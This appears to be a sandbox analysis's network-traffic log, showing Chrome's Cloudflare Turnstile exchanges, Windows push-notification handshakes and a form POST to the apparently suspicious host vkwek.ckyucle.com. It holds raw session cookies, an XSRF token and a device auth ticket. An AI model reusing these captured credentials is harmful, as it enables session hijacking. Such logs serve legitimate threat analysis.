                                                              28192.168.2.649752104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:44 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:44 UTC375INHTTP/1.1 404 Not Found
                                                              Date: Wed, 03 Jul 2024 07:40:44 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 7
                                                              Connection: close
                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                              cf-chl-out: dz1z/F5Y/H+JvFOJLnjQBg==$4H114BBoHY4JTvNfzKIetg==
                                                              Server: cloudflare
                                                              CF-RAY: 89d53aab4c9e728a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:44 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                              Data Ascii: invalid


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              29192.168.2.64975440.115.3.253443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:48 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 5a 39 39 2b 4f 31 79 4f 6b 75 59 65 7a 54 59 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 31 62 65 37 64 32 64 32 33 62 64 66 31 34 62 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: KZ99+O1yOkuYezTY.1Context: 21be7d2d23bdf14b
                                                              2024-07-03 07:40:48 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:40:48 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4b 5a 39 39 2b 4f 31 79 4f 6b 75 59 65 7a 54 59 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 31 62 65 37 64 32 64 32 33 62 64 66 31 34 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: KZ99+O1yOkuYezTY.2Context: 21be7d2d23bdf14b<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:40:48 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 4b 5a 39 39 2b 4f 31 79 4f 6b 75 59 65 7a 54 59 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 31 62 65 37 64 32 64 32 33 62 64 66 31 34 62 0d 0a 0d 0a
                                                              Data Ascii: BND 3 CON\QOS 56MS-CV: KZ99+O1yOkuYezTY.3Context: 21be7d2d23bdf14b
                                                              2024-07-03 07:40:48 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:40:48 UTC58INData Raw: 4d 53 2d 43 56 3a 20 38 4d 58 51 37 68 4c 72 4b 45 75 35 32 7a 2b 54 77 69 4d 73 4c 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: 8MXQ7hLrKEu52z+TwiMsLg.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              30192.168.2.64975540.115.3.253443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:52 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 52 54 45 32 4b 38 35 6f 45 61 59 46 7a 33 36 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 66 65 65 31 62 65 63 33 61 31 65 38 39 65 36 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: iRTE2K85oEaYFz36.1Context: bfee1bec3a1e89e6
                                                              2024-07-03 07:40:52 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:40:52 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 69 52 54 45 32 4b 38 35 6f 45 61 59 46 7a 33 36 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 66 65 65 31 62 65 63 33 61 31 65 38 39 65 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: iRTE2K85oEaYFz36.2Context: bfee1bec3a1e89e6<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:40:52 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 69 52 54 45 32 4b 38 35 6f 45 61 59 46 7a 33 36 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 66 65 65 31 62 65 63 33 61 31 65 38 39 65 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: iRTE2K85oEaYFz36.3Context: bfee1bec3a1e89e6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                              2024-07-03 07:40:52 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:40:52 UTC58INData Raw: 4d 53 2d 43 56 3a 20 49 59 59 6c 41 31 6c 59 64 55 79 51 46 41 57 70 4f 77 66 39 43 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: IYYlA1lYdUyQFAWpOwf9Cg.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.662909104.17.2.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:00 UTC917OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              Content-Length: 32509
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Content-type: application/x-www-form-urlencoded
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              CF-Challenge: e7db8d6cd2b6574
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Origin: https://challenges.cloudflare.com
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:00 UTC16384OUTData Raw: 76 5f 38 39 64 35 33 61 37 35 39 65 63 38 30 63 62 34 3d 44 6a 43 48 58 55 47 4c 59 47 2d 62 43 51 49 2d 51 2d 59 48 32 43 63 49 63 78 47 41 73 42 48 52 2d 63 33 73 4e 73 43 6a 47 64 73 24 73 42 4d 48 73 4f 43 73 49 48 47 43 55 78 6b 73 79 78 48 52 6a 55 75 73 66 4f 2d 68 70 71 73 51 59 47 51 73 47 41 31 4f 43 48 6e 57 6d 70 79 73 6e 53 61 38 73 52 37 77 54 73 54 6f 43 73 33 57 2d 38 49 48 41 39 71 73 44 34 6a 6a 75 30 33 73 73 54 31 73 44 59 48 73 44 45 4f 4d 47 79 76 63 47 78 51 54 50 24 6a 73 52 4d 4b 55 73 47 44 76 76 4f 55 61 72 35 77 55 42 53 68 69 62 31 51 49 2d 44 4d 5a 44 4d 73 44 62 61 73 24 65 37 4e 7a 42 32 61 73 54 53 42 47 76 75 25 32 62 75 4b 32 50 54 48 62 4f 69 48 45 6a 4a 4f 45 42 33 71 42 50 7a 50 53 79 30 79 49 69 78 5a 38 55 38 79 51
                                                              Data Ascii: v_89d53a759ec80cb4=DjCHXUGLYG-bCQI-Q-YH2CcIcxGAsBHR-c3sNsCjGds$sBMHsOCsIHGCUxksyxHRjUusfO-hpqsQYGQsGA1OCHnWmpysnSa8sR7wTsToCs3W-8IHA9qsD4jju03ssT1sDYHsDEOMGyvcGxQTP$jsRMKUsGDvvOUar5wUBShib1QI-DMZDMsDbas$e7NzB2asTSBGvu%2buK2PTHbOiHEjJOEB3qBPzPSy0yIixZ8U8yQ
                                                              2024-07-03 07:41:00 UTC16125OUTData Raw: 48 63 61 73 78 47 46 73 63 48 61 61 73 75 55 6a 63 69 73 4b 4d 62 4b 6e 48 63 74 73 4c 73 5a 73 24 4d 73 65 2b 2d 48 51 43 55 64 73 69 48 78 2b 79 33 73 67 48 51 73 55 67 73 47 62 24 59 55 78 73 53 48 33 2d 63 75 73 79 73 42 72 68 47 48 55 48 33 2d 55 6f 33 68 73 33 69 34 4a 73 63 48 44 61 63 59 73 6c 48 47 35 73 30 73 55 48 78 49 73 4d 73 65 61 42 48 55 4a 73 74 2d 54 48 63 2b 73 70 61 24 73 63 2d 73 77 4c 52 43 55 67 73 4c 73 52 43 73 33 73 45 73 73 75 47 70 43 4f 4d 24 73 63 71 4d 47 48 52 43 73 30 73 75 73 24 73 73 77 6a 54 69 6e 62 47 4c 73 69 62 54 78 47 46 73 74 56 71 4f 37 2b 73 6c 48 33 61 24 54 73 71 48 73 59 55 2d 73 55 2d 54 49 43 6e 73 64 73 52 61 47 65 48 6f 73 61 73 63 31 65 43 52 43 47 72 73 78 59 78 6a 55 70 73 6a 48 51 6b 47 46 73 6c 48
                                                              Data Ascii: HcasxGFscHaasuUjcisKMbKnHctsLsZs$Mse+-HQCUdsiHx+y3sgHQsUgsGb$YUxsSH3-cusysBrhGHUH3-Uo3hs3i4JscHDacYslHG5s0sUHxIsMseaBHUJst-THc+spa$sc-swLRCUgsLsRCs3sEssuGpCOM$scqMGHRCs0sus$sswjTinbGLsibTxGFstVqO7+slH3a$TsqHsYU-sU-TICnsdsRaGeHosasc1eCRCGrsxYxjUpsjHQkGFslH
                                                              2024-07-03 07:41:01 UTC1257INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:01 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Content-Length: 3420
                                                              Connection: close
                                                              cf-chl-out-s: tjpXjza9oG9wsiFVxOju7aNcaDqcXQX4r2CzNnJcQq9p7O5ZHHAWxhx5TkTRRXA9hhKIT+9wravg8gH4upgM/l82R2Kmh5PBq4tSqnk/XHGzTItneRq8KVKesRDMiOBVkE60A0jiz7leUMaC+1851ixC3iDQk4rwf2tF89DuVOe1iY2Jw/MoTlTzwxDCrQT9Rn1GwLbVoqfPkeG7Q2fxNTx33QkdP5PjaJP+XDEI05b3HDMtiKfuzF3YY5xhjdNWXql1MFJbydDmWaufPJ8YZPhrpXD4wAc4tX31y05UpDj2hMxT3zsknLvYI5R5aFSFwOnDtiqDjqG49kTEqnHFsP7BkP8kKVvRMw9XEiMaDqIlNXUxct4ESGS5XoKmQDQHhPCpmOKgU64fxQbjUn8re+Sr2FvEi4SuB9nrNajdgHHpXMlEDr4M5SYN1dgBpIGs7Bb53TtplDRKZt/Az0jc3FlAJdGoRLL0V8She9sVpOYJD4+LFHbD5nvjqUCKRi+6PPUMwYLLBySELHv0yPsNbeOsKUfOoHopZTuKab3c4M2FA8eDnZDymxkZ3liPgzpwjXagFgK1xaevHiezXxkCst/zhUxjx2NKGsAKU54yjUMVnUD6siKebyeZjI4Jp/plVi/PqNJ9A88UxiC3vDr2Y8lk9DkmnFuAt/wK+r+ItYdohqdlOEsM35szzt70tn5ZyjY30Eha3Mv6IM7DlO+9RbbSuh6DlbtoEqY93rO/gKrkxxGeKKju8fKi4SUmjizScL+HFE1wJK5DdnZRVCy+67kE6HThl0qzv5kH6BQPVWmBPy3j7aPdY5RB1jinsifu$zHDgCOLx1wDoOXuq3kUqLg==
                                                              cf-chl-out: lVhfafTAXYfOGGKm7C8iFuOoOv55e1N+tQQI4xFiGRycHJhGzoDiKMsPydjTmF4yGJXPPYFOP7sFvM5see4+P3s9N42QTPKoD5WvlK/JIabcUBNWsgAbaS2Z/9Pr7kIS$ibOxvc6khR7WPFXBoWsMRQ==
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b118cd74241-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:41:01 UTC112INData Raw: 78 72 66 41 67 38 71 35 7a 59 61 4f 76 4d 32 49 6e 5a 32 6d 6a 71 6e 57 74 62 72 43 6c 4e 4f 36 30 72 4c 5a 7a 74 47 64 32 70 76 42 32 62 57 37 77 38 62 70 78 36 75 2b 6f 73 6a 46 76 75 4b 74 79 63 4c 6d 72 39 44 37 2b 72 7a 58 74 74 66 35 33 75 54 77 2b 38 54 63 38 66 4c 45 34 41 59 48 7a 67 73 4d 32 38 73 4b 31 4d 33 71 7a 68 6a 78
                                                              Data Ascii: xrfAg8q5zYaOvM2InZ2mjqnWtbrClNO60rLZztGd2pvB2bW7w8bpx6u+osjFvuKtycLmr9D7+rzXttf53uTw+8Tc8fLE4AYHzgsM28sK1M3qzhjx
                                                              2024-07-03 07:41:01 UTC1369INData Raw: 38 67 37 57 42 74 33 59 44 41 72 79 37 66 77 4f 39 67 50 77 49 75 6b 69 4c 68 76 73 4b 43 45 4d 4b 66 49 4c 49 69 73 76 43 79 51 78 4e 42 4d 51 2b 68 38 74 45 52 35 46 48 68 34 68 52 78 6b 48 4a 78 6b 56 41 43 59 62 53 6b 4a 41 55 41 73 7a 54 55 38 33 53 6c 51 39 4d 54 73 58 4e 30 78 4c 5a 45 46 50 4e 68 31 4a 47 32 5a 6f 50 7a 74 62 57 30 4a 53 53 45 31 6d 4c 56 4e 4b 4b 6b 70 48 64 56 70 6d 58 48 4a 58 62 31 4e 68 55 31 78 7a 59 33 42 5a 51 57 64 71 58 6e 70 2b 62 57 5a 45 6c 46 78 52 54 32 69 46 64 57 39 38 6b 34 5a 2b 58 6e 70 35 6c 4a 2b 68 66 4a 31 39 63 58 39 67 6c 5a 61 42 69 6f 4f 51 72 47 2b 64 67 32 36 4a 72 6f 32 70 67 71 61 5a 72 72 61 74 75 6f 75 41 6f 37 4f 7a 65 49 43 42 6b 72 61 33 67 6f 4f 41 77 38 2b 4e 71 34 6d 55 30 4a 43 69 7a 63 76
                                                              Data Ascii: 8g7WBt3YDAry7fwO9gPwIukiLhvsKCEMKfILIisvCyQxNBMQ+h8tER5FHh4hRxkHJxkVACYbSkJAUAszTU83SlQ9MTsXN0xLZEFPNh1JG2ZoPztbW0JSSE1mLVNKKkpHdVpmXHJXb1NhU1xzY3BZQWdqXnp+bWZElFxRT2iFdW98k4Z+Xnp5lJ+hfJ19cX9glZaBioOQrG+dg26Jro2pgqaZrratuouAo7OzeICBkra3goOAw8+Nq4mU0JCizcv
                                                              2024-07-03 07:41:01 UTC1369INData Raw: 75 48 77 45 76 73 59 34 74 30 49 35 2b 58 72 2f 42 7a 6f 42 53 6f 6d 37 77 6f 75 4a 67 41 32 49 69 50 34 46 50 73 73 2b 30 41 4d 2b 2f 34 63 50 7a 55 59 52 53 45 67 46 55 74 47 53 52 6f 70 4d 46 45 6a 51 44 42 45 4a 69 35 54 4d 53 74 48 56 7a 41 62 4f 52 64 4e 48 47 49 63 57 6a 64 42 53 47 67 36 52 53 68 63 4c 6a 70 41 63 55 42 4e 62 6d 39 47 54 6d 39 6a 4f 47 73 38 61 45 39 4a 65 32 39 53 67 33 39 6a 52 57 46 6b 69 46 6d 4c 53 48 68 4d 6b 46 32 41 59 6d 32 54 68 57 52 68 6d 70 6c 71 5a 6d 6c 36 62 6e 5a 66 6f 57 46 39 59 35 39 30 67 61 4b 6d 65 70 75 6e 6d 33 36 4a 61 4a 75 43 74 49 53 79 68 62 65 7a 6f 6f 75 4f 72 34 79 2f 72 4c 61 41 73 62 2b 62 67 4d 61 68 6d 63 53 2b 6f 62 57 57 77 61 36 48 73 4d 53 51 6e 73 2b 68 72 72 65 7a 78 4b 75 50 72 73 2b 31
                                                              Data Ascii: uHwEvsY4t0I5+Xr/BzoBSom7wouJgA2IiP4FPss+0AM+/4cPzUYRSEgFUtGSRopMFEjQDBEJi5TMStHVzAbORdNHGIcWjdBSGg6RShcLjpAcUBNbm9GTm9jOGs8aE9Je29Sg39jRWFkiFmLSHhMkF2AYm2ThWRhmplqZml6bnZfoWF9Y590gaKmepunm36JaJuCtISyhbezoouOr4y/rLaAsb+bgMahmcS+obWWwa6HsMSQns+hrrezxKuPrs+1
                                                              2024-07-03 07:41:01 UTC570INData Raw: 73 5a 4b 69 73 57 39 2f 67 6a 2f 41 73 6f 4e 41 66 74 46 43 73 5a 4a 68 49 31 4a 43 30 35 4e 2f 77 34 49 44 77 2b 4e 68 41 36 42 66 34 55 50 79 41 38 4b 69 74 4b 52 54 4e 4d 53 46 45 31 54 30 73 7a 45 31 59 76 46 54 31 59 57 44 51 31 51 55 77 76 51 32 4a 51 61 6a 5a 6c 51 45 74 4c 62 30 51 71 62 47 35 47 4c 57 4a 31 54 48 55 30 57 56 46 4c 65 6e 68 70 4d 7a 35 39 62 45 35 67 65 6e 39 35 68 49 4f 45 66 59 79 51 65 70 46 7a 69 6c 4e 79 63 49 39 31 61 31 71 55 57 35 42 35 69 48 4e 66 62 71 4f 42 6c 5a 75 6d 59 46 75 62 68 32 6c 71 69 49 79 6f 70 6e 2b 50 63 4b 71 47 73 48 43 58 6d 61 2b 6d 71 4c 69 62 65 48 4f 79 6f 48 79 65 6f 4c 32 37 6e 37 75 71 68 4c 33 46 72 4d 6a 41 73 38 75 68 73 72 53 7a 79 38 79 33 75 4c 6e 51 79 39 61 59 6e 74 4c 42 77 62 37 45 33
                                                              Data Ascii: sZKisW9/gj/AsoNAftFCsZJhI1JC05N/w4IDw+NhA6Bf4UPyA8KitKRTNMSFE1T0szE1YvFT1YWDQ1QUwvQ2JQajZlQEtLb0QqbG5GLWJ1THU0WVFLenhpMz59bE5gen95hIOEfYyQepFzilNycI91a1qUW5B5iHNfbqOBlZumYFubh2lqiIyopn+PcKqGsHCXma+mqLibeHOyoHyeoL27n7uqhL3FrMjAs8uhsrSzy8y3uLnQy9aYntLBwb7E3


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.662911104.17.2.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:01 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:01 UTC375INHTTP/1.1 404 Not Found
                                                              Date: Wed, 03 Jul 2024 07:41:01 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 7
                                                              Connection: close
                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                              cf-chl-out: bnqcWyO0I0VHDQ3UvW45pA==$c7sV2ixOd2+Gu37NSWq2EQ==
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b16392d0f39-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:41:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                              Data Ascii: invalid


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.662912188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:01 UTC1420OUTPOST /wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              Content-Length: 1213
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-platform: "Windows"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygZ26iAPVbOuoG7fS
                                                              Accept: */*
                                                              Origin: https://vkwek.ckyucle.com
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://vkwek.ckyucle.com/2DUx/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6Ii9RdnVXMlk4Q0pJOFlzbnA2bDRxWXc9PSIsInZhbHVlIjoia0llVG1KMVREc0xvbDVLeVR1Y2wrYTdaNjFmRlY4d2RBSFRacldCbHg4M0x2RWVaTncyMEtlV1JDYnlxejdjbTZUZzBRMmhTWHRpYzhxQlRkK2JkZzJxS1dLMWFRVUg5TEhPa1RBczRwaC9QbU94UFZCN3huU3ordDN3cHFpdWQiLCJtYWMiOiI3MTEwZTM5YzMwMTJmODU5ZWVlYWE3OTJjYWM2ZDkyODU1ZTEwMmJiNjZiNGQxODE4ZTM0YzE4YzczMWM0OGRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZvOEpGSFdCQnIrMzkrenRNc1dQN3c9PSIsInZhbHVlIjoiTkVFZTNSeUR5c0IwaWxVN0FTOGlORGtXUy9nVWR0NGhLRFpRYnFoTUJlSjhmTGdtR0srUnVSTTdKR3l2QjlxY0Q0N3lHMVpaZFQ0d1l6ZFkxK01mN0tJMnE0eVl5V0daekViWUZOWjJmQ0p5YmZGUmwxTXAwWDRtUUZVUnVwWGwiLCJtYWMiOiI4ODFkOTBjYjRmMWIxOTQxMDI0NWJmZmM2MDFhM2FhZGNjNjI4ODc0NWQwZGNiNDY5ZTRhZGUzOWVhZmVhMjk3IiwidGFnIjoiIn0%3D
